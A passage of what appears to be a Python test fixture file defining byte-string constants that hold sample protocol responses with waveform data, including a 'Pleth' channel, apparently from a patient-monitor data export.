b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x20\x00\x20\x00\x20\x00\x20\x00\x1f\xff\x1f\xff\x1f\xff" \ b"\x20\x00\x1f\xff\x1f\xff\x1f\xfe\x1f\xfd\x1f\xfc\x1f\xfa\x1f\xf9" \ b"\x1f\xf9\x1f\xf9\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7" \ b"\x1f\xf6\x1f\xf5\x1f\xf6\x1f\xf5\x1f\xf6\x1f\xf5\x1f\xf6\x1f\xf5" \ 
b"\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf2" \ b"\x1f\xf3\x1f\xf2\x1f\xf3\x1f\xf2\x1f\xf3\x1f\xf2\x1f\xf3\x1f\xf4" \ b"\x1f\xf4\x1f\xf4\x1f\xf5\x1f\xf5\x1f\xf6\x1f\xf5\x1f\xf5\x1f\xf6" \ b"\x1f\xf7\x1f\xf7\x1f\xf8\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf9\x1f\xf9" \ b"\x1f\xf8\x1f\xf9\x1f\xf9\x1f\xfa\x1f\xfb\x1f\xfb\x1f\xfc\x1f\xfb" \ b"\x1f\xfc\x1f\xfc\x1f\xfd\x1f\xfc\x1f\xfd\x1f\xfe\x1f\xfd\x1f\xfd" \ b"\x1f\xfe\x1f\xfe\x1f\xfd\x1f\xfc\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf1\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xed\x1f\xed\x1f\xeb\x1f\xeb\x1f\xe9\x1f\xe9" \ b"\x1f\xe9\x1f\xe7\x1f\xe7\x1f\xe5\x1f\xe5\x1f\xe3\x1f\xe3\x1f\xe5" \ b"\x1f\xe3\x1f\xe3\x1f\xe1\x1f\xe1\x1f\xdf\x1f\xdf\x1f\xdd\x1f\xdb" \ b"\x1f\xdb\x1f\xdb\x1f\xdb\x1f\xdd\x1f\xdd\x1f\xdf\x1f\xe1\x1f\xe1" \ b"\x1f\xe1\x1f\xe3\x1f\xe3\x1f\xe5\x1f\xe7\x1f\xe7\x1f\xe7\x1f\xe9" \ b"\x1f\xeb\x1f\xeb\x1f\xed\x1f\xed\x1f\xed\x1f\xef\x1f\xef\x1f\xf1" \ b"\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf7\x1f\xf9" \ b"\x1f\xf9\x1f\xfb\x1f\xfd\x1f\xff\x1f\xfd\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ 
b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x07\x8e\x00\x0d\x00\xe0\x09\x21\x00\x02\x07\x8e\x09\x2f" \ b"\x00\x04\x00\x01\x00\x09\x09\x3f\x00\x0c\x00\x00\x08\x00\x00\x01" \ b"\x42\x80\x00\x00\x00\x00\x09\x6d\x00\x06\x00\x20\x10\x0c\x80\x00" \ b"\x09\x8d\x00\x04\x00\x00\x00\x40\x09\x24\x00\x04\x00\x02\x4b\xb4" \ b"\x09\x27\x00\x10\x00\x0e\x00\x50\x00\x6c\x00\x65\x00\x74\x00\x68" \ b"\x00\x20\x00\x00\x09\x96\x00\x02\x02\x00\x09\x11\x00\x02\x00\x06" \ b"\x09\x40\x00\x02\x00\x00\x09\x6f\x00\x0c\x00\x7f\xff\xff\x00\x7f" \ b"\xff\xff\x00\x00\x0f\xff\x09\x1a\x00\x24\x00\x04\x00\x20\x00\x7f" \ b"\xff\xff\x04\x00\x00\x00\x00\x7f\xff\xff\x06\x00\x00\x01\x00\x7f" \ b"\xff\xff\x0a\x00\x00\x01\x00\x7f\xff\xff\x0c\x00\x00\x00\x09\x6e" \ b"\x00\x46\x4b\xb4\x04\x00\x00\x40\x06\x1f\x06\x1d\x06\x1a\x06\x15" \ b"\x06\x0e\x06\x05\x05\xfb\x05\xef\x05\xe0\x05\xd0\x05\xbe\x05\xab" \ b"\x05\x95\x05\x7f\x05\x66\x05\x4d\x05\x33\x05\x18\x04\xfc\x04\xe1" \ b"\x04\xc6\x04\xab\x04\x91\x04\x78\x04\x60\x04\x4b\x04\x37\x04\x26" \ b"\x04\x18\x04\x0d\x04\x05\x04\x01" rsp_wave_6_no_2 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x01\x0e\x80\x28\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ 
b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ 
b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x04\x00\x04\x04\x04\x0b\x04\x18\x04\x28\x04\x3e\x04\x57" \ b"\x04\x76\x04\x99\x04\xc0\x04\xec\x05\x1d\x05\x51\x05\x89\x05\xc5" \ b"\x06\x05\x06\x47\x06\x8c\x06\xd3\x07\x1c\x07\x67\x07\xb3\x07\xff" \ b"\x08\x4c\x08\xbe\x09\x09\x09\x53\x09\xbf\x0a\x03\x0a\x44\x0a\x83" \ b"\x0a\xd8" rsp_wave_6_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x02\x0e\x80\x30\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ 
b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\xa1\x94\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xff\x20\x04\x20\x0c" \ b"\x20\x14\x20\x1c\x20\x26\x20\x2f\x20\x38\x20\x42\x20\x4b\x20\x55" \ b"\x20\x5e\x20\x68\x20\x71\x20\x7a\x20\x83\x20\x8d\x20\x96\x20\x9f" \ b"\x20\xa8\x20\xad\x20\xab\x20\xa6\x20\x9e\x20\x95\x20\x8c\x20\x82" \ b"\x20\x78\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\xa0\x84\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfe\x20\x00" \ b"\x20\x02\x20\x06\x20\x08\x20\x0b\x20\x0e\x20\x10\x20\x13\x20\x17" \ b"\x20\x18\x20\x1a\x20\x1d\x20\x20\x20\x23\x20\x25\x20\x28\x20\x2b" \ 
b"\x20\x2e\x20\x31\x20\x33\x20\x30\x20\x30\x20\x2d\x20\x2a\x20\x28" \ b"\x20\x26\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\xa1\x04\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x20\x01\x20\x05\x20\x0b" \ b"\x20\x11\x20\x15\x20\x1d\x20\x23\x20\x29\x20\x31\x20\x37\x20\x3d" \ b"\x20\x45\x20\x4d\x20\x53\x20\x59\x20\x5f\x20\x67\x20\x6d\x20\x73" \ b"\x20\x79\x20\x7b\x20\x77\x20\x75\x20\x6d\x20\x67\x20\x61\x20\x59" \ b"\x20\x51\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x0b\x0c\x0b\x3c\x0b\x8d\x0b\xae\x0b\xc9\x0b\xef\x0b\xfa" \ b"\x0b\xff\x0b\xfc\x0b\xf3\x0b\xe5\x0b\xd2\x0b\xba\x0b\x9d\x0b\x7b" \ b"\x0b\x56\x0b\x2c\x0b\x00\x0a\xd0\x0a\x9d\x0a\x68\x0a\x31\x09\xf9" \ b"\x09\xbf\x09\x85\x09\x4b\x09\x10\x08\xd7\x08\x9e\x08\x66\x08\x30" \ b"\x07\xfb" rsp_wave_6_no_4 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x03\x0e\x80\x38\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ 
b"\x01\x00\x20\x6e\x20\x63\x20\x59\x20\x4f\x20\x45\x20\x3a\x20\x30" \ b"\x20\x26\x20\x1c\x20\x12\x20\x08\x1f\xff\x1f\xf7\x1f\xf3\x1f\xf0" \ b"\x1f\xee\x1f\xed\x1f\xed\x1f\xec\x1f\xec\x1f\xed\x1f\xed\x1f\xed" \ b"\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xee\x1f\xee" \ b"\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xf0\x1f\xf0" \ b"\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0" \ b"\x1f\xf0\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf4\x1f\xf3\x1f\xf3\x1f\xf2" \ b"\x1f\xf1\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x20\x22\x20\x1f\x20\x1d\x20\x19\x20\x17\x20\x14\x20\x12" \ b"\x20\x0e\x20\x0c\x20\x0a\x20\x06\x20\x03\x20\x01\x1f\xff\x1f\xfe" \ b"\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xff\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe" \ 
b"\x20\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x20\x01\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00" \ b"\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00" \ b"\x20\x00\x1f\xff\x1f\xff\x1f\xff\x20\x00\x1f\xff\x1f\xff\x1f\xfe" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x20\x4b\x20\x43\x20\x3b\x20\x35\x20\x2d\x20\x25\x20\x1d" \ b"\x20\x17\x20\x0f\x20\x07\x20\x01\x1f\xfb\x1f\xf5\x1f\xf3\x1f\xf1" \ b"\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xf1\x1f\xf1\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x07\xc9\x07\x99\x07\x6b\x07\x40\x07\x18\x06\xf3\x06\xd2" \ b"\x06\xb3\x06\x97\x06\x7f\x06\x69\x06\x57\x06\x47\x06\x3a\x06\x2f" \ b"\x06\x27\x06\x21\x06\x1d\x06\x1a\x06\x19\x06\x19\x06\x1a\x06\x1b" \ b"\x06\x1d\x06\x1e\x06\x20\x06\x20\x06\x20\x06\x1f\x06\x1d\x06\x1a" \ b"\x06\x15" rsp_nu_7_no_1 = \ b"\xe1\x00\x00\x02\x00\x05" \ 
